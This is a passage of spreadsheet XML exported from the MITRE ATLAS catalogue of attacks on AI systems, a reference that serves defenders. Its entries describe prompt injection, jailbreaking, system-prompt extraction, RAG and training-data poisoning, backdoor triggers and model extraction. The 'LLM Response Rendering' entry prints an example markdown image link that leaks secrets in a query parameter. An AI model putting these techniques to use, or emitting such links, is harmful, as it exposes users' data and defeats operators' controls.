    <t xml:space="preserve">Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0049</t>
  </si>
  <si>
    <t>AML.T0048</t>
  </si>
  <si>
    <t>attack-pattern--493d8a7f-63a0-419a-a8c7-74f85f1afab0</t>
  </si>
  <si>
    <t>External Harms</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse their access to a victim system and use its resources or capabilities to further their goals by causing harms external to that system.
These harms could affect the organization (e.g. Financial Harm, Reputational Harm), its users (e.g. User Harm), or the general public (e.g. Societal Harm).
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048</t>
  </si>
  <si>
    <t>AML.T0024.002</t>
  </si>
  <si>
    <t>attack-pattern--1a1d7e16-bb89-46dd-aa36-e65c9047bf28</t>
  </si>
  <si>
    <t>Extract AI Model</t>
  </si>
  <si>
    <t>Adversaries may extract a functional copy of a private model.
By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
Adversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting.
Model extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.002</t>
  </si>
  <si>
    <t>AML.T0056</t>
  </si>
  <si>
    <t>attack-pattern--2243a101-6295-4b82-8075-0c287d602a0e</t>
  </si>
  <si>
    <t>Extract LLM System Prompt</t>
  </si>
  <si>
    <t>Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file.
System prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
  </si>
  <si>
    <t>AML.T0071</t>
  </si>
  <si>
    <t>attack-pattern--46843164-cb30-4c02-bc73-10ae30c6082a</t>
  </si>
  <si>
    <t>False RAG Entry Injection</t>
  </si>
  <si>
    <t>Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved the, the LLM is tricked into treating part of the retrieved content as a false RAG result. 
By including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly. 
The adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0071</t>
  </si>
  <si>
    <t>AML.T0048.000</t>
  </si>
  <si>
    <t>attack-pattern--2e4aefac-93e9-42bc-9f19-300111f5de70</t>
  </si>
  <si>
    <t>Financial Harm</t>
  </si>
  <si>
    <t xml:space="preserve">Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.000</t>
  </si>
  <si>
    <t>AML.T0044</t>
  </si>
  <si>
    <t>attack-pattern--84295c1b-dfa5-44a8-bb1f-47dcd0915635</t>
  </si>
  <si>
    <t>Full AI Model Access</t>
  </si>
  <si>
    <t>Adversaries may gain full "white-box" access to an AI model.
This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology.
They may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0044</t>
  </si>
  <si>
    <t>AML.T0064</t>
  </si>
  <si>
    <t>attack-pattern--7eeb9b48-ed18-4e84-80b5-35b8223e3cf9</t>
  </si>
  <si>
    <t>Gather RAG-Indexed Targets</t>
  </si>
  <si>
    <t>Adversaries may identify data sources used in retrieval augmented generation (RAG) systems for targeting purposes. By pinpointing these sources, attackers can focus on poisoning or otherwise manipulating the external data repositories the AI relies on.
RAG-indexed data may be identified in public documentation about the system, or by interacting with the system directly and observing any indications of or references to external data sources.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0064</t>
  </si>
  <si>
    <t>AML.T0016.002</t>
  </si>
  <si>
    <t>attack-pattern--1da3c8bb-158a-4ce1-8a92-93b2dee4b9a9</t>
  </si>
  <si>
    <t>Generative AI</t>
  </si>
  <si>
    <t>Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.
Adversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
  </si>
  <si>
    <t>AML.T0010.000</t>
  </si>
  <si>
    <t>attack-pattern--7ff2727f-a254-4323-b182-e050bf0db8b0</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.000</t>
  </si>
  <si>
    <t>AML.T0073</t>
  </si>
  <si>
    <t>attack-pattern--21c89e42-5b62-4e44-b83d-33e0eebb1eed</t>
  </si>
  <si>
    <t>Impersonation</t>
  </si>
  <si>
    <t>Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing](/techniques/AML.T0052), or [Spearphishing via Social Engineering LLM](/techniques/AML.T0052.000)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary's ultimate goals, possibly against multiple victims.
Adversaries may target resources that are part of the AI DevOps lifecycle, such as model repositories, container registries, and software registries.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0073</t>
  </si>
  <si>
    <t>AML.T0051.001</t>
  </si>
  <si>
    <t>attack-pattern--83120ec7-b57c-49c5-a595-95a6982dfce0</t>
  </si>
  <si>
    <t>Indirect</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites.
These malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051.001</t>
  </si>
  <si>
    <t>AML.T0024.000</t>
  </si>
  <si>
    <t>attack-pattern--5aa7eba8-9cd1-4d20-b6e6-81b1ec780c9c</t>
  </si>
  <si>
    <t>Infer Training Data Membership</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may infer the membership of a data sample in its training set, which raises privacy concerns.
Some strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](/techniques/AML.T0005.001), others use statistics of model prediction scores.
This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.000</t>
  </si>
  <si>
    <t>AML.T0043.004</t>
  </si>
  <si>
    <t>attack-pattern--746aeca6-ef05-4cad-8b29-5677cf1aa6d9</t>
  </si>
  <si>
    <t>Insert Backdoor Trigger</t>
  </si>
  <si>
    <t xml:space="preserve">The adversary may add a perceptual trigger into inference data.
The trigger may be imperceptible or non-obvious to humans.
This technique is used in conjunction with [Poison AI Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.004</t>
  </si>
  <si>
    <t>AML.T0024.001</t>
  </si>
  <si>
    <t>attack-pattern--bf0aa41d-6932-48a8-a357-346ce7f15eef</t>
  </si>
  <si>
    <t>Invert AI Model</t>
  </si>
  <si>
    <t>AI models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API.
By querying the inference API strategically, adversaries can back out potentially private information embedded within the training data.
This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.001</t>
  </si>
  <si>
    <t>AML.T0000.000</t>
  </si>
  <si>
    <t>attack-pattern--0663b3da-43ac-4328-ad18-8fedf7a11b7a</t>
  </si>
  <si>
    <t>Journals and Conference Proceedings</t>
  </si>
  <si>
    <t>Many of the publications accepted at premier artificial intelligence conferences and journals come from commercial labs.
Some journals and conferences are open access, others may require paying for access or a membership.
These publications will often describe in detail all aspects of a particular approach for reproducibility.
This information can be used by adversaries to implement the paper.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.000</t>
  </si>
  <si>
    <t>AML.T0057</t>
  </si>
  <si>
    <t>attack-pattern--d6c070bc-ed05-4f84-8ebc-48b2df8d1fac</t>
  </si>
  <si>
    <t>LLM Data Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may craft prompts that induce the LLM to leak sensitive information.
This can include private user data or proprietary information.
The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0057</t>
  </si>
  <si>
    <t>AML.T0054</t>
  </si>
  <si>
    <t>attack-pattern--ef74d856-323e-47d9-ad54-1f2a9a91fcf6</t>
  </si>
  <si>
    <t>LLM Jailbreak</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to place LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM.
Once successfully jailbroken, the LLM can be used in unintended ways by the adversary.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0054</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t>AML.T0053</t>
  </si>
  <si>
    <t>attack-pattern--dea40e9d-00d1-48fd-b26e-1d307490596c</t>
  </si>
  <si>
    <t>LLM Plugin Compromise</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins.
LLMs are often connected to other services or resources via plugins to increase their capabilities.
Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.
This may allow adversaries to execute API calls to integrated applications or plugins, providing the adversary with increased privileges on the system.
Adversaries may take advantage of connected data sources to retrieve sensitive information.
They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
  </si>
  <si>
    <t>Execution, Privilege Escalation</t>
  </si>
  <si>
    <t>AML.T0065</t>
  </si>
  <si>
    <t>attack-pattern--0c7c0e15-6279-4b1d-9707-3ce1a4dd4bb2</t>
  </si>
  <si>
    <t>LLM Prompt Crafting</t>
  </si>
  <si>
    <t>Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed.
The adversary may iterate on the prompt to ensure that it works as-intended consistently.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0065</t>
  </si>
  <si>
    <t>AML.T0051</t>
  </si>
  <si>
    <t>attack-pattern--a920c087-f6ce-4d6f-b7b8-6b4bafc1c351</t>
  </si>
  <si>
    <t>LLM Prompt Injection</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.
These "prompt injections" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary's instructions instead.
Prompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation.
They may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands.
The effects of a prompt injection can persist throughout an interactive session with an LLM.
Malicious prompts may be injected directly by the adversary ([Direct](/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects.
Prompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051</t>
  </si>
  <si>
    <t>AML.T0068</t>
  </si>
  <si>
    <t>attack-pattern--010bee3b-b3ce-4ba7-b936-16e8b56c4b3e</t>
  </si>
  <si>
    <t>LLM Prompt Obfuscation</t>
  </si>
  <si>
    <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
This may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0068</t>
  </si>
  <si>
    <t>AML.T0061</t>
  </si>
  <si>
    <t>attack-pattern--84dc16b9-496a-451e-9a3f-1a2d6c19adbe</t>
  </si>
  <si>
    <t>LLM Prompt Self-Replication</t>
  </si>
  <si>
    <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0061</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>AML.T0077</t>
  </si>
  <si>
    <t>attack-pattern--60a5a4d5-78b3-4da4-89bc-d69e99333652</t>
  </si>
  <si>
    <t>LLM Response Rendering</t>
  </si>
  <si>
    <t>An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images which automatically make a request to an adversary controlled server, or clickable links which require user interaction.
For example, an LLM may produce the following markdown:
```
![ATLAS](https://atlas.mitre.org/image.png?secrets=private_data)
```
Which is rendered by the client as:
```
&lt;img src="https://atlas.mitre.org/image.png?secrets=private_data"&gt;
```
When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0077</t>
  </si>
  <si>
    <t>AML.T0067</t>
  </si>
  <si>
    <t>attack-pattern--2562ad09-faa4-4cdf-b3fb-41bcf5e06b2f</t>
  </si>
  <si>
    <t>LLM Trusted Output Components Manipulation</t>
  </si>
  <si>
    <t>Adversaries may utilize prompts to a large language model (LLM) which manipulate various components of its response in order to make it appear trustworthy to the user. This helps the adversary continue to operate in the victim's environment and evade detection by the users it interacts with.
The LLM may be instructed to tailor its language to appear more trustworthy to the user or attempt to manipulate the user to take certain actions. Other response components that could be manipulated include links, recommended follow-up actions, retrieved document metadata, and [Citations](/techniques/AML.T0067.000).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0067</t>
  </si>
  <si>
    <t>AML.T0011.001</t>
  </si>
  <si>
    <t>attack-pattern--24a70892-6962-43aa-bd44-59409b4f2803</t>
  </si>
  <si>
    <t>Malicious Package</t>
  </si>
  <si>
    <t>Adversaries may develop malicious software packages that when imported by a user have a deleterious effect.
Malicious packages may behave as expected to the user. They may be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011.001</t>
  </si>
  <si>
    <t>AML.T0018</t>
  </si>
  <si>
    <t>attack-pattern--aa9644dc-7314-4d43-b595-bf1aad275fe0</t>
  </si>
  <si>
    <t>Manipulate AI Model</t>
  </si>
  <si>
    <t>Adversaries may directly manipulate an AI model to change its behavior or introduce malicious code. Manipulating a model gives the adversary a persistent change in the system. This can include poisoning the model by changing its weights, modifying the model architecture to change its behavior, and embedding malware which may be executed when the model is loaded.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018</t>
  </si>
  <si>
    <t>AI Attack Staging, Persistence</t>
  </si>
  <si>
    <t>AML.T0043.003</t>
  </si>
  <si>
    <t>attack-pattern--559daa3f-d332-47b8-8f9e-b883732564b4</t>
  </si>
  <si>
    <t>Manual Modification</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manually modify the input data to craft adversarial data.
They may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task.
The adversary may use trial and error until they are able to verify they have a working adversarial input.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
  </si>
  <si>
    <t>AML.T0074</t>
  </si>
  <si>
    <t>attack-pattern--502d0b4b-0e4b-4294-9d50-e01093f1c291</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0074</t>
  </si>
  <si>
    <t>AML.T0010.003</t>
  </si>
  <si>
    <t>attack-pattern--2dff830e-5644-41e7-93ff-fd0552da77fe</t>
  </si>
  <si>
    <t>Model</t>
  </si>
  <si>
    <t>AI-enabled systems often rely on open sourced models in various ways.
Most commonly, the victim organization may be using these models for fine tuning.
These models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset.
Loading models often requires executing some saved code in the form of a saved model file.
These can be compromised with traditional malware, or through some adversarial AI techniques.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.003</t>
  </si>
  <si>
    <t>AML.T0002.001</t>
  </si>
  <si>
    <t>attack-pattern--d9135863-13f5-4d54-9434-c24c29b75b15</t>
  </si>
  <si>
    <t>Models</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may acquire public models to use in their operations.
Adversaries may seek models used by the victim organization or models that are representative of those used by the victim organization.
Representative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset.
The adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite).
Acquired models are useful in advancing the adversary's operations and are frequently used to tailor attacks to the victim model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002.001</t>
  </si>
  <si>
    <t>AML.T0018.001</t>
  </si>
  <si>
    <t>attack-pattern--291f82aa-907f-4ff9-a984-f04c1ab369bd</t>
  </si>
  <si>
    <t>Modify AI Model Architecture</t>
  </si>
  <si>
    <t>Adversaries may directly modify an AI model's architecture to re-define it's behavior. This can include adding or removing layers as well as adding pre or post-processing operations.
The effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.001</t>
  </si>
  <si>
    <t>AML.T0016</t>
  </si>
  <si>
    <t>attack-pattern--2b522145-c609-4950-a106-e8c416dd1b41</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Adversaries may search for and obtain software capabilities for use in their operations.
Capabilities may be specific to AI-based attacks [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular AI-enabled system.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016</t>
  </si>
  <si>
    <t>AML.T0052</t>
  </si>
  <si>
    <t>attack-pattern--e65ae421-3b6c-449e-979f-b450d55d7423</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t xml:space="preserve">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Generative AI, including LLMs that generate synthetic text, visual deepfakes of faces, and audio deepfakes of speech, is enabling adversaries to scale targeted phishing campaigns. LLMs can interact with users via text conversations and can be programmed with a meta prompt to phish for sensitive information. Deepfakes can be use in impersonation as an aid to phishing.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0052</t>
  </si>
  <si>
    <t>AML.T0008.003</t>
  </si>
  <si>
    <t>attack-pattern--3756561f-0794-4127-91db-76a227d0f322</t>
  </si>
  <si>
    <t>Physical Countermeasures</t>
  </si>
  <si>
    <t>Adversaries may acquire or manufacture physical countermeasures to aid or support their attack.
These components may be used to disrupt or degrade the model, such as adversarial patterns printed on stickers or T-shirts, disguises, or decoys. They may also be used to disrupt or degrade the sensors used in capturing data, such as laser pointers, light bulbs, or other tools.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.003</t>
  </si>
  <si>
    <t>AML.T0041</t>
  </si>
  <si>
    <t>attack-pattern--68ec4fb6-15df-4841-abdd-8e0cd8534520</t>
  </si>
  <si>
    <t>Physical Environment Access</t>
  </si>
  <si>
    <t xml:space="preserve">In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks.
If the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected.
By modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0041</t>
  </si>
  <si>
    <t>AML.T0018.000</t>
  </si>
  <si>
    <t>attack-pattern--985c6a6f-cad4-4c6a-bf32-0c3c58d57519</t>
  </si>
  <si>
    <t>Poison AI Model</t>
  </si>
  <si>
    <t>Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model.
Adversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process. 
The change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.000</t>
  </si>
  <si>
    <t>AML.T0020</t>
  </si>
  <si>
    <t>attack-pattern--3b88e298-97d5-451d-bbf5-1b13f5a2ade2</t>
  </si>
  <si>
    <t>Poison Training Data</t>
  </si>
  <si>
    <t>Adversaries may attempt to poison datasets used by an AI model by modifying the underlying data or its labels.
This allows the adversary to embed vulnerabilities in AI models trained on the data that may not be easily detectable.
Data poisoning attacks may or may not require modifying the labels.
The embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004)
Poisoned data can be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0020</t>
  </si>
  <si>
    <t>Persistence, Resource Development</t>
  </si>
  <si>
    <t>AML.T0000.001</t>
  </si>
  <si>
    <t>attack-pattern--084cfcad-b515-4c14-b36a-d97ba9063850</t>
  </si>
  <si>
    <t>Pre-Print Repositories</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven't been peer reviewed.
They may contain research notes, or technical reports that aren't typically published in journals or conference proceedings.
Pre-print repositories also serve as a central location to share papers that have been accepted to journals.
Searching pre-print repositories  provide adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.001</t>
  </si>
  <si>
    <t>AML.T0060</t>
  </si>
  <si>
    <t>attack-pattern--5f879def-5cd4-45d3-b330-b5642ec2f741</t>
  </si>
  <si>
    <t>Publish Hallucinated Entities</t>
  </si>
  <si>
    <t>Adversaries may create an entity they control, such as a software package, website, or email address to a source hallucinated by an LLM. The hallucinations may take the form of package names commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0060</t>
  </si>
  <si>
    <t>AML.T0019</t>
  </si>
  <si>
    <t>attack-pattern--2de4e5ad-3cd3-4e53-beb8-1809a5aad790</t>
  </si>
  <si>
    <t>Publish Poisoned Datasets</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location.
The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset.
This data may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0019</t>
  </si>
  <si>
    <t>AML.T0058</t>
  </si>
  <si>
    <t>attack-pattern--e8053731-4b16-4dbc-89e7-90accdffc0fd</t>
  </si>
  <si>
    <t>Publish Poisoned Models</t>
  </si>
  <si>
    <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0058</t>
  </si>
  <si>
    <t>AML.T0070</t>
  </si>
  <si>
    <t>attack-pattern--66f96e17-ee2c-4e77-aeb2-08d4db84621a</t>
  </si>
  <si>
    <t>RAG Poisoning</t>
  </si>
  <si>
    <t>Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).
The content may be targeted such that it would always surface as a search result for a specific user query. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions, or false RAG entries.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0070</t>
  </si>
  <si>
    <t>AML.T0048.001</t>
  </si>
  <si>
    <t>attack-pattern--9ce7dbb0-5b4e-480c-bec7-b7db65a1ad97</t>
  </si>
  <si>
    <t>Reputational Harm</t>
  </si>
  <si>
    <t xml:space="preserve">Reputational harm involves a degradation of public perception and trust in organizations.  Examples of reputation-harming incidents include scandals or false impersonations.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.001</t>
  </si>
  <si>
    <t>AML.T0066</t>
  </si>
  <si>
    <t>attack-pattern--f31b06f2-9f55-4477-a7df-278c6ea9e2d8</t>
  </si>
  <si>
    <t>Retrieval Content Crafting</t>
  </si>
  <si>
    <t>Adversaries may write content designed to be retrieved by user queries and influence a user of the system in some way. This abuses the trust the user has in the system.
The crafted content can be combined with a prompt injection. It can also stand alone in a separate document or email. The adversary must get the crafted content into the victim\u0027s database, such as a vector database used in a retrieval augmented generation (RAG) system. This may be accomplished via cyber access, or by abusing the ingestion mechanisms common in RAG systems (see [RAG Poisoning](/techniques/AML.T0070)).
Large language models may be used as an assistant to aid an adversary in crafting content.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0066</t>
  </si>
  <si>
    <t>AML.T0072</t>
  </si>
  <si>
    <t>attack-pattern--66169e1d-131b-41f6-8ab5-8603d8f7a03b</t>
  </si>
  <si>
    <t>Reverse Shell</t>
  </si>
  <si>
    <t>Adversaries may utilize a reverse shell to communicate and control the victim system.
Typically, a user uses a client to connect to a remote machine which is listening for connections. With a reverse shell, the adversary is listening for incoming connections initiated from the victim system.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0072</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>AML.T0004</t>
  </si>
  <si>
    <t>attack-pattern--382d0462-947d-4d13-94a9-8dccc130fbc3</t>
  </si>
  <si>
    <t>Search Application Repositories</t>
  </si>
  <si>
    <t>Adversaries may search open application repositories during targeting.
Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.
Adversaries may craft search queries seeking applications that contain a AI-enabled components.
Frequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0004</t>
  </si>
  <si>
    <t>AML.T0001</t>
  </si>
  <si>
    <t>attack-pattern--2eeed418-51b8-4243-aea6-c802a6220e30</t>
  </si>
  <si>
    <t>Search Open AI Vulnerability Analysis</t>
  </si>
  <si>
    <t>Much like the [Search Open Technical Databases](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common AI models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.
This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial AI Attacks](/techniques/AML.T0017.000) if necessary.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0001</t>
  </si>
  <si>
    <t>AML.T0000</t>
  </si>
  <si>
    <t>attack-pattern--cf106628-da5b-47b7-950f-9658391857af</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Adversaries may search for publicly available research and technical documentation to learn how and where AI is used within a victim organization.
The adversary can use this information to identify targets for attack, or to tailor an existing attack to make it more effective.
Organizations often use open source model architectures trained on additional proprietary data in production.
Knowledge of this underlying architecture allows the adversary to craft more realistic proxy models ([Create Proxy AI Model](/techniques/AML.T0005)).
An adversary can search these resources for publications for authors employed at the victim organization.
